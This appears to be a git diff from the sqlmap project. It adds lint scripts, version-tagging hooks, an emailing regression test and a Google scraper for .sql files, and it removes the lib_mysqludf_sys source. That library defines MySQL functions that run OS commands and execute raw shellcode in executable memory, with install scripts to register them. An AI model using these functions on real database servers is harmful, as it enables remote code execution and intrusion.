+find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \;

extra/shutils/postcommit-hook

@@ -0,0 +1,21 @@
+#!/bin/bash
+
+SETTINGS="../../lib/core/settings.py"
+
+declare -x SCRIPTPATH="${0}"
+
+FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
+
+if [ -f $FULLPATH ]
+then
+    LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"');
+    declare -a LINE;
+    NEW_TAG=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); print '.'.join(_[:-1]) if len(_) == 4 and _[-1] == '0' else ''" "$LINE")
+    if [ -n "$NEW_TAG" ]
+    then
+        git commit -am "Automatic monthly tagging"
+        echo "Creating new tag ${NEW_TAG}";
+        git tag $NEW_TAG;
+        git push origin $NEW_TAG
+    fi
+fi;

extra/shutils/precommit-hook

@@ -0,0 +1,22 @@
+#!/bin/bash
+
+SETTINGS="../../lib/core/settings.py"
+
+declare -x SCRIPTPATH="${0}"
+
+FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
+
+if [ -f $FULLPATH ]
+then
+    LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"');
+    declare -a LINE;
+    INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
+    if [ -n "$INCREMENTED" ]
+    then
+        sed "s/${LINE}/${INCREMENTED}/" $FULLPATH > $FULLPATH.tmp && mv $FULLPATH.tmp $FULLPATH
+        echo "Updated ${INCREMENTED} in ${FULLPATH}";
+    else
+        echo "Something went wrong in VERSION increment"
+        exit 1
+    fi
+fi;

extra/shutils/pyflakes.sh

@@ -0,0 +1,7 @@
+#!/bin/bash
+
+# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
+# See the file 'doc/COPYING' for copying permission
+
+# Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)
+find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \;

extra/shutils/pylint.py

@@ -0,0 +1,50 @@
+#! /usr/bin/env python
+
+# Runs pylint on all python scripts found in a directory tree
+# Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html
+
+import os
+import re
+import sys
+
+total = 0.0
+count = 0
+
+__RATING__ = False
+
+def check(module):
+    global total, count
+
+    if module[-3:] == ".py":
+
+        print "CHECKING ", module
+        pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r')
+        for line in pout:
+            if  re.match("E....:.", line):
+                print line
+            if __RATING__ and "Your code has been rated at" in line:
+                print line
+                score = re.findall("\d.\d\d", line)[0]
+                total += float(score)
+                count += 1
+
+if __name__ == "__main__":
+    try:
+        print sys.argv
+        BASE_DIRECTORY = sys.argv[1]
+    except IndexError:
+        print "no directory specified, defaulting to current working directory"
+        BASE_DIRECTORY = os.getcwd()
+
+    print "looking for *.py scripts in subdirectories of ", BASE_DIRECTORY
+    for root, dirs, files in os.walk(BASE_DIRECTORY):
+        if any(_ in root for _ in ("extra", "thirdparty")):
+            continue
+        for name in files:
+            filepath = os.path.join(root, name)
+            check(filepath)
+
+    if __RATING__:
+        print "==" * 50
+        print "%d modules found" % count
+        print "AVERAGE SCORE = %.02f" % (total / count)

extra/shutils/regressiontest.py

@@ -0,0 +1,165 @@
+#!/usr/bin/env python
+
+# Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+# See the file 'doc/COPYING' for copying permission
+
+import codecs
+import inspect
+import os
+import re
+import smtplib
+import subprocess
+import sys
+import time
+import traceback
+
+from email.mime.multipart import MIMEMultipart
+from email.mime.text import MIMEText
+
+sys.path.append(os.path.normpath("%s/../../" % os.path.dirname(inspect.getfile(inspect.currentframe()))))
+
+from lib.core.revision import getRevisionNumber
+
+START_TIME = time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime())
+SQLMAP_HOME = "/opt/sqlmap"
+REVISION = getRevisionNumber()
+
+SMTP_SERVER = "127.0.0.1"
+SMTP_PORT = 25
+SMTP_TIMEOUT = 30
+FROM = "regressiontest@sqlmap.org"
+#TO = "dev@sqlmap.org"
+TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
+SUBJECT = "regression test started on %s using revision %s" % (START_TIME, REVISION)
+TARGET = "debian"
+
+def prepare_email(content):
+    global FROM
+    global TO
+    global SUBJECT
+
+    msg = MIMEMultipart()
+    msg["Subject"] = SUBJECT
+    msg["From"] = FROM
+    msg["To"] = TO if isinstance(TO, basestring) else ",".join(TO)
+
+    msg.attach(MIMEText(content))
+
+    return msg
+
+def send_email(msg):
+    global SMTP_SERVER
+    global SMTP_PORT
+    global SMTP_TIMEOUT
+
+    try:
+        s = smtplib.SMTP(host=SMTP_SERVER, port=SMTP_PORT, timeout=SMTP_TIMEOUT)
+        s.sendmail(FROM, TO, msg.as_string())
+        s.quit()
+    # Catch all for SMTP exceptions
+    except smtplib.SMTPException, e:
+        print "Failure to send email: %s" % str(e)
+
+def failure_email(msg):
+    msg = prepare_email(msg)
+    send_email(msg)
+    sys.exit(1)
+
+def main():
+    global SUBJECT
+
+    content = ""
+    test_counts = []
+    attachments = {}
+
+    updateproc = subprocess.Popen("cd /opt/sqlmap/ ; python /opt/sqlmap/sqlmap.py --update", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+    stdout, stderr = updateproc.communicate()
+
+    if stderr:
+        failure_email("Update of sqlmap failed with error:\n\n%s" % stderr)
+
+    regressionproc = subprocess.Popen("python /opt/sqlmap/sqlmap.py --live-test", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=False)
+    stdout, stderr = regressionproc.communicate()
+
+    if stderr:
+        failure_email("Execution of regression test failed with error:\n\n%s" % stderr)
+
+    failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout, re.M)
+
+    for failed_test in failed_tests:
+        title = failed_test[0]
+        test_count = int(failed_test[1])
+        parse = failed_test[3] if failed_test[3] else None
+        output_folder = failed_test[4]
+        traceback = False if failed_test[5] == "False" else bool(failed_test[5])
+        detected = False if failed_test[6] else True
+
+        test_counts.append(test_count)
+
+        console_output_file = os.path.join(output_folder, "console_output")
+        log_file = os.path.join(output_folder, TARGET, "log")
+        traceback_file = os.path.join(output_folder, "traceback")
+
+        if os.path.exists(console_output_file):
+            console_output_fd = codecs.open(console_output_file, "rb", "utf8")
+            console_output = console_output_fd.read()
+            console_output_fd.close()
+            attachments[test_count] = str(console_output)
+
+        if os.path.exists(log_file):
+            log_fd = codecs.open(log_file, "rb", "utf8")
+            log = log_fd.read()
+            log_fd.close()
+
+        if os.path.exists(traceback_file):
+            traceback_fd = codecs.open(traceback_file, "rb", "utf8")
+            traceback = traceback_fd.read()
+            traceback_fd.close()
+
+        content += "Failed test case '%s' (#%d)" % (title, test_count)
+
+        if parse:
+            content += " at parsing: %s:\n\n" % parse
+            content += "### Log file:\n\n"
+            content += "%s\n\n" % log
+        elif not detected:
+            content += " - SQL injection not detected\n\n"
+        else:
+            content += "\n\n"
+
+        if traceback:
+            content += "### Traceback:\n\n"
+            content += "%s\n\n" % str(traceback)
+
+        content += "#######################################################################\n\n"
+
+    end_string = "Regression test finished at %s" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime())
+
+    if content:
+        content += end_string
+        SUBJECT = "Failed %s (%s)" % (SUBJECT, ", ".join("#%d" % count for count in test_counts))
+
+        msg = prepare_email(content)
+
+        for test_count, attachment in attachments.items():
+            attachment = MIMEText(attachment)
+            attachment.add_header("Content-Disposition", "attachment", filename="test_case_%d_console_output.txt" % test_count)
+            msg.attach(attachment)
+
+        send_email(msg)
+    else:
+        SUBJECT = "Successful %s" % SUBJECT
+        msg = prepare_email("All test cases were successful\n\n%s" % end_string)
+        send_email(msg)
+
+if __name__ == "__main__":
+    log_fd = open("/tmp/sqlmapregressiontest.log", "wb")
+    log_fd.write("Regression test started at %s\n" % START_TIME)
+
+    try:
+        main()
+    except Exception, e:
+        log_fd.write("An exception has occurred:\n%s" % str(traceback.format_exc()))
+
+    log_fd.write("Regression test finished at %s\n\n" % time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()))
+    log_fd.close()

extra/sqlharvest/__init__.py

@@ -0,0 +1,8 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+pass

extra/sqlharvest/sqlharvest.py

@@ -0,0 +1,141 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import cookielib
+import re
+import socket
+import sys
+import urllib
+import urllib2
+import ConfigParser
+
+from operator import itemgetter
+
+TIMEOUT = 10
+CONFIG_FILE = 'sqlharvest.cfg'
+TABLES_FILE = 'tables.txt'
+USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AskTB5.3)'
+SEARCH_URL = 'http://www.google.com/m?source=mobileproducts&dc=gorganic'
+MAX_FILE_SIZE = 2 * 1024 * 1024  # if a result (.sql) file for downloading is more than 2MB in size just skip it
+QUERY = 'CREATE TABLE ext:sql'
+REGEX_URLS = r';u=([^"]+?)&q='
+REGEX_RESULT = r'(?i)CREATE TABLE\s*(/\*.*\*/)?\s*(IF NOT EXISTS)?\s*(?P<result>[^\(;]+)'
+
+def main():
+    tables = dict()
+    cookies = cookielib.CookieJar()
+    cookie_processor = urllib2.HTTPCookieProcessor(cookies)
+    opener = urllib2.build_opener(cookie_processor)
+    opener.addheaders = [("User-Agent", USER_AGENT)]
+
+    conn = opener.open(SEARCH_URL)
+    page = conn.read()  # set initial cookie values
+
+    config = ConfigParser.ConfigParser()
+    config.read(CONFIG_FILE)
+
+    if not config.has_section("options"):
+        config.add_section("options")
+    if not config.has_option("options", "index"):
+        config.set("options", "index", "0")
+
+    i = int(config.get("options", "index"))
+
+    try:
+        with open(TABLES_FILE, 'r') as f:
+            for line in f.xreadlines():
+                if len(line) > 0 and ',' in line:
+                    temp = line.split(',')
+                    tables[temp[0]] = int(temp[1])
+    except:
+        pass
+
+    socket.setdefaulttimeout(TIMEOUT)
+
+    files, old_files = None, None
+    try:
+        while True:
+            abort = False
+            old_files = files
+            files = []
+
+            try:
+                conn = opener.open("%s&q=%s&start=%d&sa=N" % (SEARCH_URL, QUERY.replace(' ', '+'), i * 10))
+                page = conn.read()
+                for match in re.finditer(REGEX_URLS, page):
+                    files.append(urllib.unquote(match.group(1)))
+                    if len(files) >= 10:
+                        break
+                abort = (files == old_files)
+
+            except KeyboardInterrupt:
+                raise
+
+            except Exception, msg:
+                print msg
+
+            if abort:
+                break
+
+            sys.stdout.write("\n---------------\n")
+            sys.stdout.write("Result page #%d\n" % (i + 1))
+            sys.stdout.write("---------------\n")
+
+            for sqlfile in files:
+                print sqlfile
+
+                try:
+                    req = urllib2.Request(sqlfile)
+                    response = urllib2.urlopen(req)
+
+                    if "Content-Length" in response.headers:
+                        if int(response.headers.get("Content-Length")) > MAX_FILE_SIZE:
+                            continue
+
+                    page = response.read()
+                    found = False
+                    counter = 0
+
+                    for match in re.finditer(REGEX_RESULT, page):
+                        counter += 1
+                        table = match.group("result").strip().strip("`\"'").replace('"."', ".").replace("].[", ".").strip('[]')
+
+                        if table and not any(_ in table for _ in ('>', '<', '--', ' ')):
+                            found = True
+                            sys.stdout.write('*')
+
+                            if table in tables:
+                                tables[table] += 1
+                            else:
+                                tables[table] = 1
+                    if found:
+                        sys.stdout.write("\n")
+
+                except KeyboardInterrupt:
+                    raise
+
+                except Exception, msg:
+                    print msg
+
+            else:
+                i += 1
+
+    except KeyboardInterrupt:
+        pass
+
+    finally:
+        with open(TABLES_FILE, 'w+') as f:
+            tables = sorted(tables.items(), key=itemgetter(1), reverse=True)
+            for table, count in tables:
+                f.write("%s,%d\n" % (table, count))
+
+        config.set("options", "index", str(i + 1))
+        with open(CONFIG_FILE, 'w+') as f:
+            config.write(f)
+
+if __name__ == "__main__":
+    main()

extra/udfhack/README.txt

@@ -1,7 +0,0 @@
-Files in this folder can be used to compile shared objects that define
-some user-defined functions for MySQL and PostgreSQL. They are licensed
-under the terms of the GNU Lesser General Public License and their
-compiled versions are available on the official sqlmap subversion
-repository[1].
-
-[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/udf/

extra/udfhack/linux/README.txt

@@ -1,22 +0,0 @@
-Before compiling, you need to adapt the following to your environment:
-
-Variables in install.sh script:
---------------------------------------------------------------------------
-Variable name			Variable description
---------------------------------------------------------------------------
-USER                    Database management system administrative username
-PORT                    Database management system port
-VERSION                 Database management system version (PostgreSQL only)
-
-Variable in Makefile (MySQL only):
---------------------------------------------------------------------------
-Variable name			Variable description
---------------------------------------------------------------------------
-LIBDIR                  Database management system absolute file system
-                        path for third party libraries
-
-Then you can launch './install.sh' if you want to compile the shared
-object from the source code and create the user-defined functions on the
-database management system.
-If you only want to compile the shared object, you need to call only the
-'make' command.

extra/udfhack/linux/lib_mysqludf_sys/Makefile

@@ -1,9 +0,0 @@
-# For MySQL < 5.1
-LIBDIR=/usr/lib
-# For MySQL >= 5.1
-#LIBDIR=/usr/lib/mysql/plugin
-
-install:
-	gcc -Wall -I/usr/include/mysql -Os -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
-	strip -sx lib_mysqludf_sys.so
-	cp -f lib_mysqludf_sys.so $(LIBDIR)/lib_mysqludf_sys.so

extra/udfhack/linux/lib_mysqludf_sys/install.sh

@@ -1,47 +0,0 @@
-#!/bin/bash
-# lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-# Copyright (C) 2007  Roland Bouman 
-# Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
-# web: http://www.mysqludf.org/
-# email: mysqludfs@gmail.com, bernardo.damele@gmail.com
-# 
-# This library is free software; you can redistribute it and/or
-# modify it under the terms of the GNU Lesser General Public
-# License as published by the Free Software Foundation; either
-# version 2.1 of the License, or (at your option) any later version.
-# 
-# This library is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# Lesser General Public License for more details.
-# 
-# You should have received a copy of the GNU Lesser General Public
-# License along with this library; if not, write to the Free Software
-# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-
-# Adapt the following settings to your environment
-USER="root"
-PORT="3306"
-
-echo "Compiling the MySQL UDF"
-make
-
-if test $? -ne 0; then
-	echo "ERROR: You need libmysqlclient development software installed"
-	echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
-	echo "apt-get install libmysqlclient-dev"
-	exit 1
-else
-	echo "MySQL UDF compiled successfully"
-fi
-
-echo -e "\nPlease provide your MySQL root password"
-
-mysql -u ${USER} -P ${PORT} -p mysql < lib_mysqludf_sys.sql
-
-if test $? -ne 0; then
-	echo "ERROR: unable to install the UDF"
-	exit 1
-else
-	echo "MySQL UDF installed successfully"
-fi

extra/udfhack/linux/lib_mysqludf_sys/lib_mysqludf_sys.c

@@ -1,551 +0,0 @@
-/* 
-	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2007  Roland Bouman 
-	Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
-	web: http://www.mysqludf.org/
-	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define DLLEXP __declspec(dllexport) 
-#else
-#define DLLEXP
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-#ifdef STANDARD
-#include <string.h>
-#include <stdlib.h>
-#include <time.h>
-#ifdef __WIN__
-typedef unsigned __int64 ulonglong;
-typedef __int64 longlong;
-#else
-typedef unsigned long long ulonglong;
-typedef long long longlong;
-#endif /*__WIN__*/
-#else
-#include <my_global.h>
-#include <my_sys.h>
-#endif
-#include <mysql.h>
-#include <m_ctype.h>
-#include <m_string.h>
-#include <stdlib.h>
-
-#include <ctype.h>
-
-#ifdef HAVE_DLOPEN
-#ifdef	__cplusplus
-extern "C" {
-#endif
-
-#define LIBVERSION "lib_mysqludf_sys version 0.0.3"
-
-#ifdef __WIN__
-#define SETENV(name,value)		SetEnvironmentVariable(name,value);
-#else
-#define SETENV(name,value)		setenv(name,value,1);		
-#endif
-
-DLLEXP 
-my_bool lib_mysqludf_sys_info_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void lib_mysqludf_sys_info_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-char* lib_mysqludf_sys_info(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_get
- * 
- * Gets the value of the specified environment variable.
- */
-DLLEXP 
-my_bool sys_get_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_get_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-char* sys_get(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_set
- * 
- * Sets the value of the environment variables.
- * This function accepts a set of name/value pairs
- * which are then set as environment variables.
- * Use sys_get to retrieve the value of such a variable 
- */
-DLLEXP 
-my_bool sys_set_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_set_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-long long sys_set(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_exec
- * 
- * executes the argument commandstring and returns its exit status.
- * Beware that this can be a security hazard.
- */
-DLLEXP 
-my_bool sys_exec_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_exec_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-my_ulonglong sys_exec(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_eval
- * 
- * executes the argument commandstring and returns its standard output.
- * Beware that this can be a security hazard.
- */
-DLLEXP 
-my_bool sys_eval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_eval_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-char* sys_eval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_bineval
- * 
- * executes bynary opcodes.
- * Beware that this can be a security hazard.
- */
-DLLEXP 
-my_bool sys_bineval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-);
-
-DLLEXP 
-void sys_bineval_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-int sys_bineval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-);
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#endif
-
-
-#ifdef	__cplusplus
-}
-#endif
-
-/**
- * lib_mysqludf_sys_info
- */
-my_bool lib_mysqludf_sys_info_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	my_bool status;
-	if(args->arg_count!=0){
-		strcpy(
-			message
-		,	"No arguments allowed (udf: lib_mysqludf_sys_info)"
-		);
-		status = 1;
-	} else {
-		status = 0;
-	}
-	return status;
-}
-
-void lib_mysqludf_sys_info_deinit(
-	UDF_INIT *initid
-){
-}
-
-char* lib_mysqludf_sys_info(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-){
-	strcpy(result,LIBVERSION);
-	*length = strlen(LIBVERSION);
-	return result;
-}
-
-my_bool sys_get_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	if(args->arg_count==1
-	&&	args->arg_type[0]==STRING_RESULT){
-		initid->maybe_null = 1;
-		return 0;
-	} else {
-		strcpy(
-			message
-		,	"Expected exactly one string type parameter"
-		);		
-		return 1;
-	}
-}
-
-void sys_get_deinit(
-	UDF_INIT *initid
-){
-}
-
-char* sys_get(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-){
-	char* value = getenv(args->args[0]);
-	if(value == NULL){
-		*is_null = 1;
-	} else {
-		*length = strlen(value);
-	} 
-	return value;
-}
-
-my_bool sys_set_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	if(args->arg_count!=2){
-		strcpy(
-			message
-		,	"Expected exactly two arguments"
-		);		
-		return 1;
-	}
-	if(args->arg_type[0]!=STRING_RESULT){
-		strcpy(
-			message
-		,	"Expected string type for name parameter"
-		);		
-		return 1;
-	}
-	args->arg_type[1]=STRING_RESULT;
-	if((initid->ptr=malloc(
-		args->lengths[0]
-	+	1
-	+	args->lengths[1]
-	+	1
-	))==NULL){
-		strcpy(
-			message
-		,	"Could not allocate memory"
-		);		
-		return 1;
-	}	
-	return 0;
-}
-
-void sys_set_deinit(
-	UDF_INIT *initid
-){
-	if (initid->ptr!=NULL){
-		free(initid->ptr);
-	}
-}
-
-long long sys_set(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-){	
-	char *name = initid->ptr;
-	char *value = name + args->lengths[0] + 1; 
-	memcpy(
-		name
-	,	args->args[0]
-	,	args->lengths[0]
-	);
-	*(name + args->lengths[0]) = '\0';
-	memcpy(
-		value
-	,	args->args[1]
-	,	args->lengths[1]
-	);
-	*(value + args->lengths[1]) = '\0';
-	return SETENV(name,value);		
-}
-
-my_bool sys_exec_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	unsigned int i=0;
-	if(args->arg_count == 1
-	&& args->arg_type[i]==STRING_RESULT){
-		return 0;
-	} else {
-		strcpy(
-			message
-		,	"Expected exactly one string type parameter"
-		);		
-		return 1;
-	}
-}
-
-void sys_exec_deinit(
-	UDF_INIT *initid
-){
-}
-
-my_ulonglong sys_exec(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-){
-	return system(args->args[0]);
-}
-
-my_bool sys_eval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	unsigned int i=0;
-	if(args->arg_count == 1
-	&& args->arg_type[i]==STRING_RESULT){
-		return 0;
-	} else {
-		strcpy(
-			message
-		,	"Expected exactly one string type parameter"
-		);		
-		return 1;
-	}
-}
-
-void sys_eval_deinit(
-	UDF_INIT *initid
-){
-}
-
-char* sys_eval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-){
-	FILE *pipe;
-	char line[1024];
-	unsigned long outlen, linelen;
-
-	result = malloc(1);
-	outlen = 0;
-
-	pipe = popen(args->args[0], "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (!(*result) || result == NULL) {
-		*is_null = 1;
-	} else {
-		result[outlen-1] = 0x00;
-		*length = strlen(result);
-	}
-
-	return result;
-}
-
-my_bool sys_bineval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-){
-	return 0;
-}
-
-void sys_bineval_deinit(
-	UDF_INIT *initid
-){
-	
-}
-
-int sys_bineval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-){
-	int32 argv0_size;
-	size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	int pID;
-	char *code;
-#else
-	int *addr;
-	size_t page_size;
-	pid_t pID;
-#endif
-
-	argv0_size = strlen(args->args[0]);
-	len = (size_t)argv0_size;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	// allocate a +rwx memory page
-	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-	strncpy(code, args->args[0], len);
-
-	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
-	pID = fork();
-	if(pID<0)
-		return 1;
-
-	if(pID==0)
-	{
-		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
-		page_size = (len+page_size) & ~(page_size);		// align to page boundary
-
-		// mmap an rwx memory page
-		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
-
-		if (addr == MAP_FAILED)
-			return 1;
-
-		strncpy((char *)addr, args->args[0], len);
-
-		((void (*)(void))addr)();
-	}
-
-	if(pID>0)
-		waitpid(pID, 0, WNOHANG);
-#endif
-
-	return 0;
-}
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__asm
-		{
-			mov eax, [lpParameter]
-			call eax
-		}
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-
-	}
-
-	return 0;
-}
-#endif
-
-#endif /* HAVE_DLOPEN */

extra/udfhack/linux/lib_mysqludf_sys/lib_mysqludf_sys.sql

@@ -1,35 +0,0 @@
-/*
-        lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-        Copyright (C) 2007  Roland Bouman
-        Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
-        web: http://www.mysqludf.org/
-        email: roland.bouman@gmail.com, bernardo.damele@gmail.com
-
-        This library is free software; you can redistribute it and/or
-        modify it under the terms of the GNU Lesser General Public
-        License as published by the Free Software Foundation; either
-        version 2.1 of the License, or (at your option) any later version.
-
-        This library is distributed in the hope that it will be useful,
-        but WITHOUT ANY WARRANTY; without even the implied warranty of
-        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-        Lesser General Public License for more details.
-
-        You should have received a copy of the GNU Lesser General Public
-        License along with this library; if not, write to the Free Software
-        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
-DROP FUNCTION IF EXISTS sys_get;
-DROP FUNCTION IF EXISTS sys_set;
-DROP FUNCTION IF EXISTS sys_exec;
-DROP FUNCTION IF EXISTS sys_eval;
-DROP FUNCTION IF EXISTS sys_bineval;
-
-CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_bineval RETURNS int SONAME 'lib_mysqludf_sys.so';

extra/udfhack/linux/lib_postgresqludf_sys/Makefile

@@ -1,16 +0,0 @@
-LIBDIR=/tmp
-
-8.4:
-	gcc -Wall -I/usr/include/postgresql/8.4/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
-	strip -sx lib_postgresqludf_sys.so
-	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
-
-8.3:
-	gcc -Wall -I/usr/include/postgresql/8.3/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
-	strip -sx lib_postgresqludf_sys.so
-	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
-
-8.2:
-	gcc -Wall -I/usr/include/postgresql/8.2/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
-	strip -sx lib_postgresqludf_sys.so
-	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so

extra/udfhack/linux/lib_postgresqludf_sys/install.sh

@@ -1,59 +0,0 @@
-#!/bin/bash
-# lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-# Copyright (C) 2009-2010  Bernardo Damele A. G.
-# web: http://bernardodamele.blogspot.com/
-# email: bernardo.damele@gmail.com
-# 
-# This library is free software; you can redistribute it and/or
